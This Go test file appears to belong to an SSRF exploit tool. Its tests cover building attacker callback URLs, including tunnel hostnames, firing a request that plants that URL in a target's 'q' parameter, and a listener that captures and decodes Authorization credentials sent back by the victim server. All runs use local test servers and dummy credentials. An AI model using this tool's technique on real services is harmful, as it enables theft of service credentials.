README.md
Rendering markdown...
package main
import (
"context"
"encoding/base64"
"io"
"net/http"
"net/http/httptest"
"strings"
"testing"
"time"
)
// encodeBasic builds an HTTP Authorization header value using the Basic
// scheme: the literal prefix "Basic " followed by the padded standard base64
// encoding of s (typically "user:password").
func encodeBasic(s string) string {
	const scheme = "Basic "
	payload := base64.StdEncoding.EncodeToString([]byte(s))
	return scheme + payload
}
// -- buildCallbackURL ---------------------------------------------------------
// TestBuildCallbackURL checks how buildCallbackURL normalises the host it is
// given into a callback URL ending in ssrfPath. Per the expectations below:
//   - bare hosts default to http and get the listener port appended;
//   - http URLs without a port get the listener port appended, while an
//     explicit port is kept and the listener port ignored;
//   - https URLs without a port get no port appended;
//   - trailing slashes are stripped and IPv6 literals end up bracketed.
func TestBuildCallbackURL(t *testing.T) {
	// Each case is {subtest name, host argument, listener port, expected URL}.
	cases := []struct {
		desc, host, port, expected string
	}{
		{"bare IP - port appended", "192.168.1.10", "9090", "http://192.168.1.10:9090" + ssrfPath},
		{"bare IP with different port - correct port appended", "192.168.1.10", "7777", "http://192.168.1.10:7777" + ssrfPath},
		{"bare hostname - port appended", "myhost.local", "9090", "http://myhost.local:9090" + ssrfPath},
		{"http IP no port - port appended", "http://192.168.1.10", "9090", "http://192.168.1.10:9090" + ssrfPath},
		{"http IP with explicit port - used as-is", "http://192.168.1.10:9090", "9090", "http://192.168.1.10:9090" + ssrfPath},
		{"http IP with different explicit port - listener port ignored", "http://192.168.1.10:8888", "9090", "http://192.168.1.10:8888" + ssrfPath},
		{"http IP with explicit port and trailing slash - slash stripped", "http://192.168.1.10:8888/", "9090", "http://192.168.1.10:8888" + ssrfPath},
		{"https tunnel hostname - no port appended", "https://random-words.trycloudflare.com", "9090", "https://random-words.trycloudflare.com" + ssrfPath},
		{"https tunnel hostname with trailing slash - slash stripped", "https://random-words.trycloudflare.com/", "9090", "https://random-words.trycloudflare.com" + ssrfPath},
		{"http IP with trailing slash - slash stripped and port appended", "http://192.168.1.10/", "9090", "http://192.168.1.10:9090" + ssrfPath},
		{"http VPS hostname no explicit port - port appended", "http://vps.example.com", "9090", "http://vps.example.com:9090" + ssrfPath},
		{"http VPS hostname with explicit port - used as-is", "http://vps.example.com:9090", "9090", "http://vps.example.com:9090" + ssrfPath},
		{"http IPv6 no port - brackets preserved and port appended", "http://[::1]", "9090", "http://[::1]:9090" + ssrfPath},
		{"bare IPv6 no brackets - brackets added and port appended", "::1", "9090", "http://[::1]:9090" + ssrfPath},
		{"bare IPv6 with brackets - brackets preserved and port appended", "[::1]", "9090", "http://[::1]:9090" + ssrfPath},
		{"https IP no port - treated as tunnel, no port appended", "https://192.168.1.10", "9090", "https://192.168.1.10" + ssrfPath},
		{"http IPv6 with explicit port - used as-is", "http://[::1]:9090", "9090", "http://[::1]:9090" + ssrfPath},
		{"https IPv6 no port - treated as tunnel, no port appended", "https://[::1]", "9090", "https://[::1]" + ssrfPath},
		{"https IPv6 with explicit port - used as-is", "https://[::1]:443", "9090", "https://[::1]:443" + ssrfPath},
	}
	for _, c := range cases {
		t.Run(c.desc, func(t *testing.T) {
			if actual := buildCallbackURL(c.host, c.port); actual != c.expected {
				t.Errorf("buildCallbackURL(%q, %q)\n got %s\n want %s", c.host, c.port, actual, c.expected)
			}
		})
	}
}
// -- decodeAuth ---------------------------------------------------------------
// TestDecodeAuth checks decodeAuth against the header shapes it must handle.
// Per the expectations below:
//   - an exact "Basic " prefix is base64-decoded, tolerating missing padding
//     and trailing whitespace;
//   - an undecodable payload yields "";
//   - any other scheme, including lowercase "basic", is returned unchanged.
func TestDecodeAuth(t *testing.T) {
	// Each case is {subtest name, Authorization header, expected result}.
	cases := []struct {
		desc, header, expected string
	}{
		{"empty header", "", ""},
		{"valid Basic auth", encodeBasic("testuser:testpassword"), "testuser:testpassword"},
		{"colon in password", encodeBasic("user:p@ss:w0rd"), "user:p@ss:w0rd"},
		{"non-Basic scheme returned as-is", "Bearer some-token", "Bearer some-token"},
		{"invalid base64 returns empty string", "Basic !!!not-valid-base64!!!", ""},
		{"Basic with empty payload - decodes to empty string", "Basic ", ""},
		{"lowercase basic scheme returned as-is", "basic dXNlcjpwYXNz", "basic dXNlcjpwYXNz"},
		// "ab:cd" encoded without its trailing "=".
		{"unpadded base64 - decoded despite missing padding", "Basic YWI6Y2Q", "ab:cd"},
		// "user:pass" encoded, followed by a trailing space.
		{"trailing whitespace in payload - still decoded", "Basic dXNlcjpwYXNz ", "user:pass"},
	}
	for _, c := range cases {
		t.Run(c.desc, func(t *testing.T) {
			if actual := decodeAuth(c.header); actual != c.expected {
				t.Errorf("decodeAuth(%q)\n got %q\n want %q", c.header, actual, c.expected)
			}
		})
	}
}
// -- callbackHandler ----------------------------------------------------------
// TestCallbackHandler drives callbackHandler directly with httptest requests.
// Each case checks the response status and what, if anything, the handler
// leaves on the done channel. The channel has capacity 1 and is optionally
// pre-filled to simulate a callback that was already captured.
func TestCallbackHandler(t *testing.T) {
	type handlerCase struct {
		desc         string
		target       string // request path
		authHeader   string // Authorization header; not set when empty
		verbose      bool
		payload      string // request body
		expectStatus int
		expectCreds  string // "" means nothing may be waiting on done afterwards
		queued       string // when non-empty, sent on done before the handler runs
	}
	cases := []handlerCase{
		{
			desc:         "wrong path - 404 and done untouched",
			target:       "/not-the-ssrf-path",
			expectStatus: http.StatusNotFound,
		},
		{
			desc:         "wrong path with verbose - headers consumed but 404 and done untouched",
			target:       "/not-the-ssrf-path",
			verbose:      true,
			payload:      "some body",
			expectStatus: http.StatusNotFound,
		},
		{
			desc:         "correct path with no auth - 200 and done untouched",
			target:       ssrfPath,
			expectStatus: http.StatusOK,
		},
		{
			desc:         "correct path with Bearer token - raw header captured",
			target:       ssrfPath,
			authHeader:   "Bearer some-token",
			expectStatus: http.StatusOK,
			expectCreds:  "Bearer some-token",
		},
		{
			desc:         "correct path with invalid base64 - 200 and done untouched",
			target:       ssrfPath,
			authHeader:   "Basic !!!invalid!!!",
			expectStatus: http.StatusOK,
		},
		{
			desc:         "correct path with valid Basic auth - decoded credentials captured",
			target:       ssrfPath,
			authHeader:   encodeBasic("admin:hunter2"),
			expectStatus: http.StatusOK,
			expectCreds:  "admin:hunter2",
		},
		{
			desc:         "verbose mode with body - credentials captured and body printed",
			target:       ssrfPath,
			authHeader:   encodeBasic("user:pass"),
			verbose:      true,
			payload:      "some request body",
			expectStatus: http.StatusOK,
			expectCreds:  "user:pass",
		},
		{
			desc:         "verbose mode with no body - body print suppressed",
			target:       ssrfPath,
			authHeader:   encodeBasic("user:pass"),
			verbose:      true,
			expectStatus: http.StatusOK,
			expectCreds:  "user:pass",
		},
		{
			desc:         "duplicate callback - channel full, credentials discarded",
			target:       ssrfPath,
			authHeader:   encodeBasic("second:creds"),
			expectStatus: http.StatusOK,
			queued:       "first:creds",
			// The channel must still hold the original value, not the duplicate.
			expectCreds: "first:creds",
		},
	}

	for _, c := range cases {
		t.Run(c.desc, func(t *testing.T) {
			done := make(chan string, 1)
			if c.queued != "" {
				done <- c.queued
			}

			req := httptest.NewRequest(http.MethodGet, c.target, strings.NewReader(c.payload))
			if c.authHeader != "" {
				req.Header.Set("Authorization", c.authHeader)
			}
			rec := httptest.NewRecorder()
			handler := callbackHandler(c.verbose, done)
			handler(rec, req)

			if rec.Code != c.expectStatus {
				t.Errorf("status: got %d, want %d", rec.Code, c.expectStatus)
			}

			// Take at most one value off done without blocking.
			var received string
			gotValue := false
			select {
			case received = <-done:
				gotValue = true
			default:
			}

			switch {
			case c.expectCreds == "" && gotValue:
				t.Errorf("done should be empty, got %q", received)
			case c.expectCreds != "" && !gotValue:
				t.Errorf("expected %q in done channel, got nothing", c.expectCreds)
			case c.expectCreds != "" && received != c.expectCreds:
				t.Errorf("creds: got %q, want %q", received, c.expectCreds)
			}
		})
	}
}
// -- fireTrigger --------------------------------------------------------------
// TestFireTrigger checks that fireTrigger requests apiPath on the target and
// passes the callback URL built from host and port in the "q" query parameter.
// It also checks that the target's 200 status is returned with a nil error.
func TestFireTrigger(t *testing.T) {
	var seenPath, seenQuery string
	target := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		seenPath, seenQuery = r.URL.Path, r.URL.Query().Get("q")
		w.WriteHeader(http.StatusOK)
	}))
	defer target.Close()

	code, err := fireTrigger(target.URL, "192.168.1.10", "9090")
	if err != nil {
		t.Fatalf("unexpected error: %v", err)
	}
	if code != http.StatusOK {
		t.Errorf("status: got %d, want %d", code, http.StatusOK)
	}
	if seenPath != apiPath {
		t.Errorf("path: got %s, want %s", seenPath, apiPath)
	}
	if expected := "http://192.168.1.10:9090" + ssrfPath; seenQuery != expected {
		t.Errorf("q param:\n got %s\n want %s", seenQuery, expected)
	}
}
// TestFireTriggerTrailingSlashOnTarget checks that a trailing slash on the
// target base URL does not leak into the request. The target must still see
// exactly apiPath and the same "q" callback URL as without the slash. The
// returned status is checked too, for parity with the no-slash case.
func TestFireTriggerTrailingSlashOnTarget(t *testing.T) {
	var gotPath, gotQ string
	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		gotPath = r.URL.Path
		gotQ = r.URL.Query().Get("q")
		w.WriteHeader(http.StatusOK)
	}))
	defer ts.Close()

	status, err := fireTrigger(ts.URL+"/", "192.168.1.10", "9090")
	if err != nil {
		t.Fatalf("unexpected error: %v", err)
	}
	if status != http.StatusOK {
		t.Errorf("status: got %d, want %d", status, http.StatusOK)
	}
	if gotPath != apiPath {
		t.Errorf("path: got %s, want %s", gotPath, apiPath)
	}
	wantQ := "http://192.168.1.10:9090" + ssrfPath
	if gotQ != wantQ {
		t.Errorf("q param:\n got %s\n want %s", gotQ, wantQ)
	}
}
// TestFireTriggerNonOKStatus checks that a 500 reply from the target is
// returned as the status code with a nil error, rather than as an error.
func TestFireTriggerNonOKStatus(t *testing.T) {
	failing := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
		w.WriteHeader(http.StatusInternalServerError)
	}))
	defer failing.Close()

	const want = http.StatusInternalServerError
	got, err := fireTrigger(failing.URL, "192.168.1.10", "9090")
	switch {
	case err != nil:
		t.Fatalf("unexpected error: %v", err)
	case got != want:
		t.Errorf("status: got %d, want %d", got, want)
	}
}
// TestFireTriggerConnectionRefused checks that fireTrigger returns an error
// when nothing is listening at the target address.
//
// The address comes from an httptest server that is closed before use, so the
// loopback port was just released and is almost certainly unbound. A fixed
// port such as 127.0.0.1:1 is not guaranteed to refuse: a firewall may
// silently drop the SYN (turning the test into a timeout), or something may
// be listening there.
func TestFireTriggerConnectionRefused(t *testing.T) {
	closed := httptest.NewServer(http.NotFoundHandler())
	target := closed.URL
	closed.Close()

	if _, err := fireTrigger(target, "192.168.1.10", "9090"); err == nil {
		t.Error("expected error for connection refused, got nil")
	}
}
// -- callback chain (integration) ---------------------------------------------
// TestCallbackChain is an end-to-end check of the real listener. It starts
// the listener via startListener with port "0", presumably OS-assigned, since
// the actual address is read back from ln.Addr(). It sends one request to
// ssrfPath with Basic credentials and expects the decoded credentials on done.
func TestCallbackChain(t *testing.T) {
	done := make(chan string, 1)
	ln, server, err := startListener("0", false, done)
	if err != nil {
		t.Fatalf("startListener failed: %v", err)
	}

	// served is closed when Serve returns. Waiting on it before the test ends
	// ensures the goroutine's t.Errorf can never run after the test has
	// completed, which would panic.
	served := make(chan struct{})
	go func() {
		defer close(served)
		if err := server.Serve(ln); err != nil && err != http.ErrServerClosed {
			t.Errorf("server error: %v", err)
		}
	}()
	defer func() {
		// Bounded so a stuck connection cannot hang teardown. Shutdown closes
		// the listener first, so Serve returns promptly either way.
		ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
		defer cancel()
		if err := server.Shutdown(ctx); err != nil {
			t.Logf("server shutdown: %v", err)
		}
		<-served
	}()

	// Use a dedicated client rather than http.DefaultClient:
	//   - the timeout makes a stuck callback fail the test instead of hanging it;
	//   - the zero-value Transport consults no environment proxy;
	//   - its idle connections can be released without touching the shared
	//     default transport.
	client := &http.Client{Timeout: 5 * time.Second, Transport: &http.Transport{}}
	defer client.CloseIdleConnections()

	creds := "service-account:secret-password"
	req, err := http.NewRequest(http.MethodGet, "http://"+ln.Addr().String()+ssrfPath, nil)
	if err != nil {
		t.Fatalf("NewRequest: %v", err)
	}
	req.Header.Set("Authorization", encodeBasic(creds))
	resp, err := client.Do(req)
	if err != nil {
		t.Fatalf("callback request failed: %v", err)
	}
	io.Copy(io.Discard, resp.Body) //nolint:errcheck
	resp.Body.Close()

	select {
	case got := <-done:
		if got != creds {
			t.Errorf("credentials: got %q, want %q", got, creds)
		}
	case <-time.After(2 * time.Second):
		t.Error("timed out waiting for callback")
	}
}
// TestCallbackChainDuplicateDiscarded sends two callbacks to a real listener
// whose done channel has capacity 1. Only the first credentials may arrive on
// done; the second callback must not leave anything behind on the channel.
func TestCallbackChainDuplicateDiscarded(t *testing.T) {
	done := make(chan string, 1)
	ln, server, err := startListener("0", false, done)
	if err != nil {
		t.Fatalf("startListener failed: %v", err)
	}

	// served is closed when Serve returns. Waiting on it before the test ends
	// ensures the goroutine's t.Errorf can never run after the test has
	// completed, which would panic.
	served := make(chan struct{})
	go func() {
		defer close(served)
		if err := server.Serve(ln); err != nil && err != http.ErrServerClosed {
			t.Errorf("server error: %v", err)
		}
	}()
	defer func() {
		// Bounded so a stuck connection cannot hang teardown. Shutdown closes
		// the listener first, so Serve returns promptly either way.
		ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
		defer cancel()
		if err := server.Shutdown(ctx); err != nil {
			t.Logf("server shutdown: %v", err)
		}
		<-served
	}()

	// Use a dedicated client rather than http.DefaultClient:
	//   - the timeout makes a stuck callback fail the test instead of hanging it;
	//   - the zero-value Transport consults no environment proxy;
	//   - its idle connections can be released without touching the shared
	//     default transport.
	client := &http.Client{Timeout: 5 * time.Second, Transport: &http.Transport{}}
	defer client.CloseIdleConnections()

	// send issues one callback carrying creds as Basic auth and drains the reply.
	send := func(creds string) {
		req, err := http.NewRequest(http.MethodGet, "http://"+ln.Addr().String()+ssrfPath, nil)
		if err != nil {
			t.Fatalf("NewRequest: %v", err)
		}
		req.Header.Set("Authorization", encodeBasic(creds))
		resp, err := client.Do(req)
		if err != nil {
			t.Fatalf("request failed: %v", err)
		}
		io.Copy(io.Discard, resp.Body) //nolint:errcheck
		resp.Body.Close()
	}
	send("first:creds")
	send("second:creds") // should be silently discarded

	select {
	case got := <-done:
		if got != "first:creds" {
			t.Errorf("expected first:creds, got %q", got)
		}
	case <-time.After(2 * time.Second):
		t.Error("timed out waiting for callback")
	}

	// The channel should now be empty: the second callback was discarded.
	select {
	case extra := <-done:
		t.Errorf("second callback leaked into channel: %q", extra)
	default:
	}
}